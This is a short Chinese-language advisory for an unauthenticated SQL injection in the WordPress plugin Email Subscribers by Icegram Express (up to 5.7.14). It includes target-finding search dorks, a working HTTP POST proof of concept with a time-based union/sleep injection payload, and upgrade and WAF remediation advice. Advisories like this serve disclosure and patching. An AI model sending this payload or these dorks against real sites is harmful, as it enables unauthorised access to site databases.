#漏洞描述:
Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce 插件(适用于 WordPress)在版本 5.7.14 及之前的所有版本中,由于对用户提供的参数转义不足,且未对现有 SQL 查询进行充分预处理,导致通过 IG_ES_Subscribers_Query 类的 run 函数存在 SQL 注入漏洞。这使得未经认证的攻击者能够将额外的 SQL 查询附加到已有查询中,从而提取数据库中的敏感信息。
#Dork(搜索语句): 1- FOFA:body="/wp-content/plugins/email-subscribers/" 2- publicwww:"/wp-content/plugins/email-subscribers/"
#POC(漏洞验证):
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
#YouTube POC 演示: https://www.youtube.com/watch?v=eDEGt_yXyvE
#如何修复? 由于所有版本直至 5.7.14 均受此 CVE 影响,建议用户将 Email Subscribers by Icegram Express 插件升级至 5.7.15 版本(或最新发布版 5.7.19)。 Patchstack 用户可以选择启用针对易受攻击插件的自动更新。 部署 WAF/WAAP 解决方案作为额外保护层。此类解决方案的优势在于,即使漏洞是未知的新漏洞(0-day),仍可通过检测利用模式和技术来阻止攻击。